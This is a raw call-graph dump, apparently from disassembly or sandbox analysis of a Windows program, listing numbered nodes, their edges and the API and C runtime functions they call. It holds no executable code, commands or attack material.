104356->104379 104357 950db6 59 API calls Mailbox 104357->104379 104358 940d13 timeGetTime 104358->104379 104359 97581f WaitForSingleObject 104361 97583c GetExitCodeProcess CloseHandle 104359->104361 104359->104379 104366 940f95 104361->104366 104362 940e5f Sleep 104390 940e70 Mailbox 104362->104390 104363 938047 59 API calls 104363->104379 104364 937667 59 API calls 104364->104390 104366->104192 104367 975af8 Sleep 104367->104390 104368 93b73c 304 API calls 104368->104379 104370 95049f timeGetTime 104370->104390 104371 940f4e timeGetTime 105625 939e5d 60 API calls 104371->105625 104374 975b8f GetExitCodeProcess 104376 975ba5 WaitForSingleObject 104374->104376 104377 975bbb CloseHandle 104374->104377 104376->104377 104376->104379 104377->104390 104379->104343 104379->104348 104379->104350 104379->104354 104379->104355 104379->104356 104379->104357 104379->104358 104379->104359 104379->104362 104379->104363 104379->104366 104379->104367 104379->104368 104379->104371 104383 939e5d 60 API calls 104379->104383 104379->104390 104398 999e4a 89 API calls 104379->104398 104400 939c90 59 API calls Mailbox 104379->104400 104401 939ea0 304 API calls 104379->104401 104402 9384c0 69 API calls 104379->104402 104404 98617e 59 API calls Mailbox 104379->104404 104405 9755d5 VariantClear 104379->104405 104406 97566b VariantClear 104379->104406 104407 938cd4 59 API calls Mailbox 104379->104407 104408 975419 VariantClear 104379->104408 104409 986e8f 59 API calls 104379->104409 104410 937de1 59 API calls 104379->104410 104411 9389b3 69 API calls 104379->104411 105487 93e6a0 104379->105487 105518 93f460 104379->105518 105537 9331ce 104379->105537 105542 93e420 331 API calls 104379->105542 105543 93fce0 104379->105543 105629 9b6018 59 API calls 104379->105629 105630 999a15 59 API calls Mailbox 104379->105630 105631 98d4f2 59 API calls 104379->105631 105632 939837 104379->105632 105650 9860ef 59 API calls 2 library calls 104379->105650 105651 938401 59 API calls 104379->105651 105652 9382df 104379->105652 104381 9b5f25 110 API calls 104381->104390 104382 93b7dd 109 API calls 104382->104390 104383->104379 104384 975874 104384->104366 104385 975c17 Sleep 104385->104379 104386 975078 Sleep 104386->104379 104388 937de1 59 API calls 104388->104390 104390->104364 104390->104366 104390->104370 104390->104374 104390->104379 104390->104381 104390->104382 104390->104384 104390->104385 104390->104386 104390->104388 105663 992408 60 API calls 104390->105663 105664 939e5d 60 API calls 104390->105664 105665 9389b3 69 API calls Mailbox 104390->105665 105666 93b73c 331 API calls 104390->105666 105667 9864da 60 API calls 104390->105667 105668 995244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104390->105668 105669 993c55 66 API calls Mailbox 104390->105669 104398->104379 104400->104379 104401->104379 104402->104379 104404->104379 104405->104379 104406->104379 104407->104379 104408->104379 104409->104379 104410->104379 104411->104379 104412->104162 104413->104169 104414->104181 104416 961940 __write_nolock 104415->104416 104417 934713 GetModuleFileNameW 104416->104417 104418 937de1 59 API calls 104417->104418 104419 934739 104418->104419 104420 934750 60 API calls 104419->104420 104421 934743 Mailbox 104420->104421 104421->104188 104423 937df0 __wsetenvp _memmove 104422->104423 104424 950db6 Mailbox 59 API calls 104423->104424 104425 937e2e 104424->104425 104425->104193 104427 933d3e __write_nolock 104426->104427 104428 937bcc 59 API calls 104427->104428 104432 933ea4 Mailbox 104427->104432 104430 933d70 104428->104430 104438 933da6 Mailbox 104430->104438 104548 9379f2 104430->104548 104431 933e77 104431->104432 104433 937de1 59 API calls 104431->104433 104432->104218 104435 933e98 104433->104435 104434 937de1 59 API calls 104434->104438 104437 933f74 59 API calls 104435->104437 104436 9379f2 59 API calls 104436->104438 104437->104432 104438->104431 104438->104432 104438->104434 104438->104436 104551 933f74 104438->104551 104557 934bb5 104440->104557 104445 96d8e6 104448 934e4a 84 API calls 104445->104448 104446 934e08 LoadLibraryExW 104567 934b6a 104446->104567 104450 96d8ed 104448->104450 104451 934b6a 3 API calls 104450->104451 104453 96d8f5 104451->104453 104593 934f0b 104453->104593 104454 934e2f 104454->104453 104455 934e3b 104454->104455 104457 934e4a 84 API calls 104455->104457 104459 9337d4 104457->104459 104459->104225 104459->104226 104461 96d91c 104601 934ec7 104461->104601 104463 96d929 104465 950db6 Mailbox 59 API calls 104464->104465 104466 9337fb 104465->104466 104466->104239 104468 9384cb 104467->104468 104469 9384f2 104468->104469 104855 9389b3 69 API calls Mailbox 104468->104855 104469->104243 104472 933ef3 104471->104472 104473 933eda 104471->104473 104475 937bcc 59 API calls 104472->104475 104474 938047 59 API calls 104473->104474 104476 933879 104474->104476 104475->104476 104477 952efd 104476->104477 104478 952f7e 104477->104478 104479 952f09 104477->104479 104858 952f90 60 API calls 3 library calls 104478->104858 104486 952f2e 104479->104486 104856 958b28 58 API calls __getptd_noexit 104479->104856 104482 952f8b 104482->104264 104483 952f15 104857 958db6 9 API calls strtoxl 104483->104857 104485 952f20 104485->104264 104486->104264 104488 9392d6 104487->104488 104489 950db6 Mailbox 59 API calls 104488->104489 104490 9392e4 104489->104490 104492 933924 104490->104492 104859 9391fc 59 API calls Mailbox 104490->104859 104493 939050 104492->104493 104860 939160 104493->104860 104495 950db6 Mailbox 59 API calls 104496 933932 104495->104496 104498 938ee0 104496->104498 104497 93905f 104497->104495 104497->104496 104499 96f17c 104498->104499 104503 938ef7 104498->104503 104499->104503 104887 938bdb 59 API calls Mailbox 104499->104887 104501 939040 104874 939d3c 104501->104874 104502 938ff8 104504 950db6 Mailbox 59 API calls 104502->104504 104503->104501 104503->104502 104506 938fff 104503->104506 104504->104506 104506->104292 104508 934ee5 85 API calls 104507->104508 104509 9995ca 104508->104509 104890 999734 104509->104890 104512 934f0b 74 API calls 104513 9995f7 104512->104513 104514 934f0b 74 API calls 104513->104514 104515 999607 104514->104515 104516 934f0b 74 API calls 104515->104516 104517 999622 104516->104517 104518 934f0b 74 API calls 104517->104518 104519 99963d 104518->104519 104520 934ee5 85 API calls 104519->104520 104521 999654 104520->104521 104522 95571c __malloc_crt 58 API calls 104521->104522 104523 99965b 104522->104523 104524 95571c __malloc_crt 58 API calls 104523->104524 104525 999665 104524->104525 104526 934f0b 74 API calls 104525->104526 104527 999679 104526->104527 104528 999109 GetSystemTimeAsFileTime 104527->104528 104529 99968c 104528->104529 104530 9996a1 104529->104530 104531 9996b6 104529->104531 104534 952d55 _free 58 API calls 104530->104534 104532 99971b 104531->104532 104533 9996bc 104531->104533 104536 952d55 _free 58 API calls 104532->104536 104896 998b06 116 API calls __fcloseall 104533->104896 104537 9996a7 104534->104537 104539 96d186 104536->104539 104540 952d55 _free 58 API calls 104537->104540 104538 999713 104541 952d55 _free 58 API calls 104538->104541 104539->104230 104542 934e4a 104539->104542 104540->104539 104541->104539 104543 934e54 104542->104543 104547 934e5b 104542->104547 104897 9553a6 104543->104897 104545 934e7b FreeLibrary 104546 934e6a 104545->104546 104546->104230 104547->104545 104547->104546 104549 937e4f 59 API calls 104548->104549 104550 9379fd 104549->104550 104550->104430 104552 933f82 104551->104552 104556 933fa4 _memmove 104551->104556 104554 950db6 Mailbox 59 API calls 104552->104554 104553 950db6 Mailbox 59 API calls 104555 933fb8 104553->104555 104554->104556 104555->104438 104556->104553 104606 934c03 104557->104606 104560 934bf5 104564 95525b 104560->104564 104561 934bec FreeLibrary 104561->104560 104562 934c03 2 API calls 104563 934bdc 104562->104563 104563->104560 104563->104561 104610 955270 104564->104610 104566 934dfc 104566->104445 104566->104446 104770 934c36 104567->104770 104570 934b8f 104572 934ba1 FreeLibrary 104570->104572 104573 934baa 104570->104573 104571 934c36 2 API calls 104571->104570 104572->104573 104574 934c70 104573->104574 104575 950db6 Mailbox 59 API calls 104574->104575 104576 934c85 104575->104576 104774 93522e 104576->104774 104578 934c91 _memmove 104579 934ccc 104578->104579 104580 934dc1 104578->104580 104581 934d89 104578->104581 104582 934ec7 69 API calls 104579->104582 104788 99991b 95 API calls 104580->104788 104777 934e89 CreateStreamOnHGlobal 104581->104777 104589 934cd5 104582->104589 104585 934f0b 74 API calls 104585->104589 104586 934d69 104586->104454 104588 96d8a7 104590 934ee5 85 API calls 104588->104590 104589->104585 104589->104586 104589->104588 104783 934ee5 104589->104783 104591 96d8bb 104590->104591 104592 934f0b 74 API calls 104591->104592 104592->104586 104594 934f1d 104593->104594 104597 96d9cd 104593->104597 104812 9555e2 104594->104812 104598 999109 104832 998f5f 104598->104832 104600 99911f 104600->104461 104602 934ed6 104601->104602 104603 96d990 104601->104603 104837 955c60 104602->104837 104605 934ede 104605->104463 104607 934bd0 104606->104607 104608 934c0c LoadLibraryA 104606->104608 104607->104562 104607->104563 104608->104607 104609 934c1d GetProcAddress 104608->104609 104609->104607 104612 95527c __freefls@4 104610->104612 104611 95528f 104659 958b28 58 API calls __getptd_noexit 104611->104659 104612->104611 104614 9552c0 104612->104614 104629 9604e8 104614->104629 104615 955294 104660 958db6 9 API calls strtoxl 104615->104660 104618 9552c5 104619 9552ce 104618->104619 104620 9552db 104618->104620 104661 958b28 58 API calls __getptd_noexit 104619->104661 104622 955305 104620->104622 104623 9552e5 104620->104623 104644 960607 104622->104644 104662 958b28 58 API calls __getptd_noexit 104623->104662 104624 95529f @_EH4_CallFilterFunc@8 __freefls@4 104624->104566 104630 9604f4 __freefls@4 104629->104630 104631 959c0b __lock 58 API calls 104630->104631 104642 960502 104631->104642 104632 96057d 104669 95881d 58 API calls __malloc_crt 104632->104669 104633 960576 104664 9605fe 104633->104664 104636 960584 104636->104633 104670 959e2b InitializeCriticalSectionAndSpinCount 104636->104670 104637 9605f3 __freefls@4 104637->104618 104639 959c93 __mtinitlocknum 58 API calls 104639->104642 104641 9605aa EnterCriticalSection 104641->104633 104642->104632 104642->104633 104642->104639 104667 956c50 59 API calls __lock 104642->104667 104668 956cba LeaveCriticalSection LeaveCriticalSection _doexit 104642->104668 104645 960627 __wopenfile 104644->104645 104646 960641 104645->104646 104658 9607fc 104645->104658 104677 9537cb 60 API calls 2 library calls 104645->104677 104675 958b28 58 API calls __getptd_noexit 104646->104675 104648 960646 104676 958db6 9 API calls strtoxl 104648->104676 104650 955310 104663 955332 LeaveCriticalSection LeaveCriticalSection _fseek 104650->104663 104651 96085f 104672 9685a1 104651->104672 104654 9607f5 104654->104658 104678 9537cb 60 API calls 2 library calls 104654->104678 104656 960814 104656->104658 104679 9537cb 60 API calls 2 library calls 104656->104679 104658->104646 104658->104651 104659->104615 104660->104624 104661->104624 104662->104624 104663->104624 104671 959d75 LeaveCriticalSection 104664->104671 104666 960605 104666->104637 104667->104642 104668->104642 104669->104636 104670->104641 104671->104666 104680 967d85 104672->104680 104674 9685ba 104674->104650 104675->104648 104676->104650 104677->104654 104678->104656 104679->104658 104683 967d91 __freefls@4 104680->104683 104681 967da7 104767 958b28 58 API calls __getptd_noexit 104681->104767 104683->104681 104685 967ddd 104683->104685 104684 967dac 104768 958db6 9 API calls strtoxl 104684->104768 104691 967e4e 104685->104691 104688 967df9 104769 967e22 LeaveCriticalSection __unlock_fhandle 104688->104769 104690 967db6 __freefls@4 104690->104674 104692 967e6e 104691->104692 104693 9544ea __wsopen_nolock 58 API calls 104692->104693 104696 967e8a 104693->104696 104694 967fc1 104695 958dc6 __invoke_watson 8 API calls 104694->104695 104697 9685a0 104695->104697 104696->104694 104698 967ec4 104696->104698 104706 967ee7 104696->104706 104699 967d85 __wsopen_helper 103 API calls 104697->104699 104700 958af4 __commit 58 API calls 104698->104700 104701 9685ba 104699->104701 104702 967ec9 104700->104702 104701->104688 104703 958b28 strtoxl 58 API calls 104702->104703 104704 967ed6 104703->104704 104707 958db6 strtoxl 9 API calls 104704->104707 104705 967fa5 104708 958af4 __commit 58 API calls 104705->104708 104706->104705 104714 967f83 104706->104714 104709 967ee0 104707->104709 104710 967faa 104708->104710 104709->104688 104711 958b28 strtoxl 58 API calls 104710->104711 104712 967fb7 104711->104712 104713 958db6 strtoxl 9 API calls 104712->104713 104713->104694 104715 95d294 __alloc_osfhnd 61 API calls 104714->104715 104716 968051 104715->104716 104717 96807e 104716->104717 104718 96805b 104716->104718 104720 967cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104717->104720 104719 958af4 __commit 58 API calls 104718->104719 104721 968060 104719->104721 104728 9680a0 104720->104728 104722 958b28 strtoxl 58 API calls 104721->104722 104724 96806a 104722->104724 104723 96811e GetFileType 104725 96816b 104723->104725 104726 968129 GetLastError 104723->104726 104730 958b28 strtoxl 58 API calls 104724->104730 104736 95d52a __set_osfhnd 59 API calls 104725->104736 104731 958b07 __dosmaperr 58 API calls 104726->104731 104727 9680ec GetLastError 104729 958b07 __dosmaperr 58 API calls 104727->104729 104728->104723 104728->104727 104732 967cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104728->104732 104733 968111 104729->104733 104730->104709 104734 968150 CloseHandle 104731->104734 104735 9680e1 104732->104735 104738 958b28 strtoxl 58 API calls 104733->104738 104734->104733 104737 96815e 104734->104737 104735->104723 104735->104727 104742 968189 104736->104742 104739 958b28 strtoxl 58 API calls 104737->104739 104738->104694 104740 968163 104739->104740 104740->104733 104741 968344 104741->104694 104744 968517 CloseHandle 104741->104744 104742->104741 104743 9618c1 __lseeki64_nolock 60 API calls 104742->104743 104755 96820a 104742->104755 104745 9681f3 104743->104745 104746 967cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104744->104746 104749 958af4 __commit 58 API calls 104745->104749 104751 968212 104745->104751 104748 96853e 104746->104748 104747 960e5b 70 API calls __read_nolock 104747->104751 104750 968546 GetLastError 104748->104750 104758 9683ce 104748->104758 104749->104755 104752 958b07 __dosmaperr 58 API calls 104750->104752 104751->104747 104753 960add __close_nolock 61 API calls 104751->104753 104751->104755 104756 9697a2 __chsize_nolock 82 API calls 104751->104756 104760 9683c1 104751->104760 104761 9683aa 104751->104761 104765 9618c1 60 API calls __lseeki64_nolock 104751->104765 104754 968552 104752->104754 104753->104751 104757 95d43d __free_osfhnd 59 API calls 104754->104757 104755->104741 104755->104751 104759 95d886 __write 78 API calls 104755->104759 104762 9618c1 60 API calls __lseeki64_nolock 104755->104762 104756->104751 104757->104758 104758->104694 104759->104755 104763 960add __close_nolock 61 API calls 104760->104763 104761->104741 104762->104755 104764 9683c8 104763->104764 104766 958b28 strtoxl 58 API calls 104764->104766 104765->104751 104766->104758 104767->104684 104768->104690 104769->104690 104771 934b83 104770->104771 104772 934c3f LoadLibraryA 104770->104772 104771->104570 104771->104571 104772->104771 104773 934c50 GetProcAddress 104772->104773 104773->104771 104775 950db6 Mailbox 59 API calls 104774->104775 104776 935240 104775->104776 104776->104578 104778 934ea3 FindResourceExW 104777->104778 104782 934ec0 104777->104782 104779 96d933 LoadResource 104778->104779 104778->104782 104780 96d948 SizeofResource 104779->104780 104779->104782 104781 96d95c LockResource 104780->104781 104780->104782 104781->104782 104782->104579 104784 934ef4 104783->104784 104785 96d9ab 104783->104785 104789 95584d 104784->104789 104787 934f02 104787->104589 104788->104579 104790 955859 __freefls@4 104789->104790 104791 95586b 104790->104791 104793 955891 104790->104793 104802 958b28 58 API calls __getptd_noexit 104791->104802 104804 956c11 104793->104804 104795 955870 104803 958db6 9 API calls strtoxl 104795->104803 104796 955897 104810 9557be 83 API calls 4 library calls 104796->104810 104799 9558a6 104811 9558c8 LeaveCriticalSection LeaveCriticalSection _fseek 104799->104811 104801 95587b __freefls@4 104801->104787 104802->104795 104803->104801 104805 956c21 104804->104805 104806 956c43 EnterCriticalSection 104804->104806 104805->104806 104807 956c29 104805->104807 104808 956c39 104806->104808 104809 959c0b __lock 58 API calls 104807->104809 104808->104796 104809->104808 104810->104799 104811->104801 104815 9555fd 104812->104815 104814 934f2e 104814->104598 104816 955609 __freefls@4 104815->104816 104817 95564c 104816->104817 104818 95561f _memset 104816->104818 104819 955644 __freefls@4 104816->104819 104820 956c11 __lock_file 59 API calls 104817->104820 104828 958b28 58 API calls __getptd_noexit 104818->104828 104819->104814 104821 955652 104820->104821 104830 95541d 72 API calls 6 library calls 104821->104830 104824 955639 104829 958db6 9 API calls strtoxl 104824->104829 104825 955668 104831 955686 LeaveCriticalSection LeaveCriticalSection _fseek 104825->104831 104828->104824 104829->104819 104830->104825 104831->104819 104835 95520a GetSystemTimeAsFileTime 104832->104835 104834 998f6e 104834->104600 104836 955238 __aulldiv 104835->104836 104836->104834 104838 955c6c __freefls@4 104837->104838 104839 955c93 104838->104839 104840 955c7e 104838->104840 104842 956c11 __lock_file 59 API calls 104839->104842 104851 958b28 58 API calls __getptd_noexit 104840->104851 104844 955c99 104842->104844 104843 955c83 104852 958db6 9 API calls strtoxl 104843->104852 104853 9558d0 67 API calls 6 library calls 104844->104853 104847 955ca4 104854 955cc4 LeaveCriticalSection LeaveCriticalSection _fseek 104847->104854 104849 955cb6 104850 955c8e __freefls@4 104849->104850 104850->104605 104851->104843 104852->104850 104853->104847 104854->104849 104855->104469 104856->104483 104857->104485 104858->104482 104859->104492 104861 939169 Mailbox 104860->104861 104862 96f19f 104861->104862 104867 939173 104861->104867 104863 950db6 Mailbox 59 API calls 104862->104863 104865 96f1ab 104863->104865 104864 93917a 104864->104497 104867->104864 104868 939c90 104867->104868 104870 939c9b 104868->104870 104869 939cd2 104869->104867 104870->104869 104873 938cd4 59 API calls Mailbox 104870->104873 104872 939cfd 104872->104867 104873->104872 104875 939d4a 104874->104875 104885 939d78 Mailbox 104874->104885 104876 939d9d 104875->104876 104879 939d50 Mailbox 104875->104879 104877 938047 59 API calls 104876->104877 104877->104885 104878 939d64 104880 939d6f 104878->104880 104881 939dcc 104878->104881 104878->104885 104879->104878 104882 96fa0f 104879->104882 104883 96f9e6 VariantClear 104880->104883 104880->104885 104881->104885 104888 938cd4 59 API calls Mailbox 104881->104888 104882->104885 104889 986e8f 59 API calls 104882->104889 104883->104885 104885->104506 104887->104503 104888->104885 104889->104885 104894 999748 __tzset_nolock _wcscmp 104890->104894 104891 9995dc 104891->104512 104891->104539 104892 934f0b 74 API calls 104892->104894 104893 999109 GetSystemTimeAsFileTime 104893->104894 104894->104891 104894->104892 104894->104893 104895 934ee5 85 API calls 104894->104895 104895->104894 104896->104538 104898 9553b2 __freefls@4 104897->104898 104899 9553c6 104898->104899 104900 9553de 104898->104900 104926 958b28 58 API calls __getptd_noexit 104899->104926 104902 956c11 __lock_file 59 API calls 104900->104902 104907 9553d6 __freefls@4 104900->104907 104904 9553f0 104902->104904 104903 9553cb 104927 958db6 9 API calls strtoxl 104903->104927 104910 95533a 104904->104910 104907->104547 104911 955349 104910->104911 104912 95535d 104910->104912 104972 958b28 58 API calls __getptd_noexit 104911->104972 104913 955359 104912->104913 104929 954a3d 104912->104929 104928 955415 LeaveCriticalSection LeaveCriticalSection _fseek 104913->104928 104916 95534e 104973 958db6 9 API calls strtoxl 104916->104973 104922 955377 104946 960a02 104922->104946 104924 95537d 104924->104913 104925 952d55 _free 58 API calls 104924->104925 104925->104913 104926->104903 104927->104907 104928->104907 104930 954a50 104929->104930 104934 954a74 104929->104934 104931 9546e6 __flush 58 API calls 104930->104931 104930->104934 104932 954a6d 104931->104932 104974 95d886 104932->104974 104935 960b77 104934->104935 104936 955371 104935->104936 104937 960b84 104935->104937 104939 9546e6 104936->104939 104937->104936 104938 952d55 _free 58 API calls 104937->104938 104938->104936 104940 954705 104939->104940 104941 9546f0 104939->104941 104940->104922 105109 958b28 58 API calls __getptd_noexit 104941->105109 104943 9546f5 105110 958db6 9 API calls strtoxl 104943->105110 104945 954700 104945->104922 104947 960a0e __freefls@4 104946->104947 104948 960a1b 104947->104948 104951 960a32 104947->104951 105126 958af4 58 API calls __getptd_noexit 104948->105126 104950 960abd 105131 958af4 58 API calls __getptd_noexit 104950->105131 104951->104950 104953 960a42 104951->104953 104952 960a20 105127 958b28 58 API calls __getptd_noexit 104952->105127 104956 960a60 104953->104956 104957 960a6a 104953->104957 105128 958af4 58 API calls __getptd_noexit 104956->105128 104959 95d206 ___lock_fhandle 59 API calls 104957->104959 104958 960a65 105132 958b28 58 API calls __getptd_noexit 104958->105132 104961 960a70 104959->104961 104964 960a83 104961->104964 104965 960a8e 104961->104965 104963 960ac9 105133 958db6 9 API calls strtoxl 104963->105133 105111 960add 104964->105111 105129 958b28 58 API calls __getptd_noexit 104965->105129 104968 960a27 __freefls@4 104968->104924 104970 960a89 105130 960ab5 LeaveCriticalSection __unlock_fhandle 104970->105130 104972->104916 104973->104913 104975 95d892 __freefls@4 104974->104975 104976 95d8b6 104975->104976 104977 95d89f 104975->104977 104978 95d955 104976->104978 104980 95d8ca 104976->104980 105075 958af4 58 API calls __getptd_noexit 104977->105075 105081 958af4 58 API calls __getptd_noexit 104978->105081 104983 95d8f2 104980->104983 104984 95d8e8 104980->104984 104982 95d8a4 105076 958b28 58 API calls __getptd_noexit 104982->105076 105002 95d206 104983->105002 105077 958af4 58 API calls __getptd_noexit 104984->105077 104985 95d8ed 105082 958b28 58 API calls __getptd_noexit 104985->105082 104987 95d8ab __freefls@4 104987->104934 104990 95d8f8 104992 95d91e 104990->104992 104993 95d90b 104990->104993 105078 958b28 58 API calls __getptd_noexit 104992->105078 105011 95d975 104993->105011 104994 95d961 105083 958db6 9 API calls strtoxl 104994->105083 104998 95d917 105080 95d94d LeaveCriticalSection __unlock_fhandle 104998->105080 104999 95d923 105079 958af4 58 API calls __getptd_noexit 104999->105079 105003 95d212 __freefls@4 105002->105003 105004 95d261 EnterCriticalSection 105003->105004 105005 959c0b __lock 58 API calls 105003->105005 105006 95d287 __freefls@4 105004->105006 105007 95d237 105005->105007 105006->104990 105010 95d24f 105007->105010 105084 959e2b InitializeCriticalSectionAndSpinCount 105007->105084 105085 95d28b LeaveCriticalSection _doexit 105010->105085 105012 95d982 __write_nolock 105011->105012 105013 95d9c1 105012->105013 105014 95d9e0 105012->105014 105057 95d9b6 105012->105057 105095 958af4 58 API calls __getptd_noexit 105013->105095 105017 95da38 105014->105017 105018 95da1c 105014->105018 105015 95c5f6 ___wstrgtold12_l 6 API calls 105019 95e1d6 105015->105019 105022 95da51 105017->105022 105101 9618c1 60 API calls 3 library calls 105017->105101 105098 958af4 58 API calls __getptd_noexit 105018->105098 105019->104998 105020 95d9c6 105096 958b28 58 API calls __getptd_noexit 105020->105096 105086 965c6b 105022->105086 105025 95d9cd 105097 958db6 9 API calls strtoxl 105025->105097 105027 95da21 105099 958b28 58 API calls __getptd_noexit 105027->105099 105029 95da5f 105031 95ddb8 105029->105031 105102 9599ac 58 API calls 2 library calls 105029->105102 105033 95ddd6 105031->105033 105034 95e14b WriteFile 105031->105034 105032 95da28 105100 958db6 9 API calls strtoxl 105032->105100 105037 95ddec 105033->105037 105038 95defa 105033->105038 105039 95ddab GetLastError 105034->105039 105067 95dd78 105034->105067 105041 95e184 105037->105041 105045 95de5b WriteFile 105037->105045 105055 95df05 105038->105055 105060 95dfef 105038->105060 105039->105067 105040 95da8b GetConsoleMode 105040->105031 105043 95daca 105040->105043 105041->105057 105107 958b28 58 API calls __getptd_noexit 105041->105107 105043->105031 105044 95dada GetConsoleCP 105043->105044 105044->105041 105070 95db09 105044->105070 105045->105039 105046 95de98 105045->105046 105046->105037 105049 95debc 105046->105049 105047 95e1b2 105108 958af4 58 API calls __getptd_noexit 105047->105108 105048 95ded8 105052 95dee3 105048->105052 105053 95e17b 105048->105053 105049->105067 105050 95df6a WriteFile 105050->105039 105056 95dfb9 105050->105056 105104 958b28 58 API calls __getptd_noexit 105052->105104 105106 958b07 58 API calls 3 library calls 105053->105106 105054 95e064 WideCharToMultiByte 105054->105039 105066 95e0ab 105054->105066 105055->105041 105055->105050 105056->105049 105056->105055 105056->105067 105057->105015 105060->105041 105060->105054 105061 95e0b3 WriteFile 105064 95e106 GetLastError 105061->105064 105061->105066 105062 95dee8 105105 958af4 58 API calls __getptd_noexit 105062->105105 105064->105066 105066->105049 105066->105060 105066->105061 105066->105067 105067->105041 105067->105048 105067->105057 105068 9662ba 60 API calls __write_nolock 105068->105070 105069 95dbf2 WideCharToMultiByte 105069->105067 105071 95dc2d WriteFile 105069->105071 105070->105067 105070->105068 105070->105069 105073 95dc5f 105070->105073 105103 9535f5 58 API calls __isleadbyte_l 105070->105103 105071->105039 105071->105073 105072 967a5e WriteConsoleW CreateFileW __putwch_nolock 105072->105073 105073->105039 105073->105067 105073->105070 105073->105072 105074 95dc87 WriteFile 105073->105074 105074->105039 105074->105073 105075->104982 105076->104987 105077->104985 105078->104999 105079->104998 105080->104987 105081->104985 105082->104994 105083->104987 105084->105010 105085->105004 105087 965c76 105086->105087 105089 965c83 105086->105089 105088 958b28 strtoxl 58 API calls 105087->105088 105090 965c7b 105088->105090 105091 965c8f 105089->105091 105092 958b28 strtoxl 58 API calls 105089->105092 105090->105029 105091->105029 105093 965cb0 105092->105093 105094 958db6 strtoxl 9 API calls 105093->105094 105094->105090 105095->105020 105096->105025 105097->105057 105098->105027 105099->105032 105100->105057 105101->105022 105102->105040 105103->105070 105104->105062 105105->105057 105106->105057 105107->105047 105108->105057 105109->104943 105110->104945 105134 95d4c3 105111->105134 105113 960b41 105147 95d43d 59 API calls 2 library calls 105113->105147 105115 960aeb 105115->105113 105116 960b1f 105115->105116 105119 95d4c3 __commit 58 API calls 105115->105119 105116->105113 105117 95d4c3 __commit 58 API calls 105116->105117 105120 960b2b CloseHandle 105117->105120 105118 960b49 105121 960b6b 105118->105121 105148 958b07 58 API calls 3 library calls 105118->105148 105122 960b16 105119->105122 105120->105113 105123 960b37 GetLastError 105120->105123 105121->104970 105125 95d4c3 __commit 58 API calls 105122->105125 105123->105113 105125->105116 105126->104952 105127->104968 105128->104958 105129->104970 105130->104968 105131->104958 105132->104963 105133->104968 105135 95d4ce 105134->105135 105138 95d4e3 105134->105138 105149 958af4 58 API calls __getptd_noexit 105135->105149 105137 95d4d3 105150 958b28 58 API calls __getptd_noexit 105137->105150 105141 95d508 105138->105141 105151 958af4 58 API calls __getptd_noexit 105138->105151 105141->105115 105142 95d512 105152 958b28 58 API calls __getptd_noexit 105142->105152 105143 95d4db 105143->105115 105145 95d51a 105153 958db6 9 API calls strtoxl 105145->105153 105147->105118 105148->105121 105149->105137 105150->105143 105151->105142 105152->105145 105153->105143 105216 961940 105154->105216 105157 934799 105222 937d8c 105157->105222 105158 93477c 105159 937bcc 59 API calls 105158->105159 105161 934788 105159->105161 105218 937726 105161->105218 105164 950791 105165 961940 __write_nolock 105164->105165 105166 95079e GetLongPathNameW 105165->105166 105167 937bcc 59 API calls 105166->105167 105168 9372bd 105167->105168 105169 93700b 105168->105169 105170 937667 59 API calls 105169->105170 105171 93701d 105170->105171 105172 934750 60 API calls 105171->105172 105173 937028 105172->105173 105174 937033 105173->105174 105175 96e885 105173->105175 105176 933f74 59 API calls 105174->105176 105180 96e89f 105175->105180 105232 937908 61 API calls 105175->105232 105178 93703f 105176->105178 105226 9334c2 105178->105226 105181 937052 Mailbox 105181->104308 105183 934ddd 136 API calls 105182->105183 105184 93688f 105183->105184 105185 96e031 105184->105185 105186 934ddd 136 API calls 105184->105186 105187 99955b 122 API calls 105185->105187 105188 9368a3 105186->105188 105189 96e046 105187->105189 105188->105185 105190 9368ab 105188->105190 105191 96e067 105189->105191 105192 96e04a 105189->105192 105194 96e052 105190->105194 105195 9368b7 105190->105195 105193 950db6 Mailbox 59 API calls 105191->105193 105196 934e4a 84 API calls 105192->105196 105208 96e0ac Mailbox 105193->105208 105334 9942f8 90 API calls _wprintf 105194->105334 105233 936a8c 105195->105233 105196->105194 105200 96e060 105200->105191 105201 96e260 105202 952d55 _free 58 API calls 105201->105202 105203 96e268 105202->105203 105204 934e4a 84 API calls 105203->105204 105206 96e271 105204->105206 105210 952d55 _free 58 API calls 105206->105210 105211 934e4a 84 API calls 105206->105211 105339 98f7a1 89 API calls 4 library calls 105206->105339 105208->105201 105208->105206 105213 937de1 59 API calls 105208->105213 105326 93750f 105208->105326 105335 98f73d 59 API calls 2 library calls 105208->105335 105336 98f65e 61 API calls 2 library calls 105208->105336 105337 99737f 59 API calls Mailbox 105208->105337 105338 93735d 59 API calls Mailbox 105208->105338 105210->105206 105211->105206 105213->105208 105217 93475d GetFullPathNameW 105216->105217 105217->105157 105217->105158 105219 937734 105218->105219 105220 937d2c 59 API calls 105219->105220 105221 934794 105220->105221 105221->105164 105223 937da6 105222->105223 105225 937d99 105222->105225 105224 950db6 Mailbox 59 API calls 105223->105224 105224->105225 105225->105161 105227 9334d4 105226->105227 105231 9334f3 _memmove 105226->105231 105229 950db6 Mailbox 59 API calls 105227->105229 105228 950db6 Mailbox 59 API calls 105230 93350a 105228->105230 105229->105231 105230->105181 105231->105228 105232->105175 105234 936ab5 105233->105234 105235 96e41e 105233->105235 105345 9357a6 60 API calls Mailbox 105234->105345 105412 98f7a1 89 API calls 4 library calls 105235->105412 105238 936ad7 105346 9357f6 67 API calls 105238->105346 105239 96e431 105413 98f7a1 89 API calls 4 library calls 105239->105413 105241 936aec 105241->105239 105243 936af4 105241->105243 105245 937667 59 API calls 105243->105245 105244 96e44d 105275 936b61 105244->105275 105246 936b00 105245->105246 105347 950957 60 API calls __write_nolock 105246->105347 105248 96e460 105252 935c6f CloseHandle 105248->105252 105249 936b6f 105253 937667 59 API calls 105249->105253 105250 936b0c 105251 937667 59 API calls 105250->105251 105254 936b18 105251->105254 105255 96e46c 105252->105255 105256 936b78 105253->105256 105257 934750 60 API calls 105254->105257 105258 934ddd 136 API calls 105255->105258 105259 937667 59 API calls 105256->105259 105260 936b26 105257->105260 105261 96e488 105258->105261 105262 936b81 105259->105262 105348 935850 ReadFile SetFilePointerEx 105260->105348 105264 96e4b1 105261->105264 105268 99955b 122 API calls 105261->105268 105350 93459b 105262->105350 105414 98f7a1 89 API calls 4 library calls 105264->105414 105267 936b52 105349 935aee SetFilePointerEx SetFilePointerEx 105267->105349 105272 96e4a4 105268->105272 105269 936b98 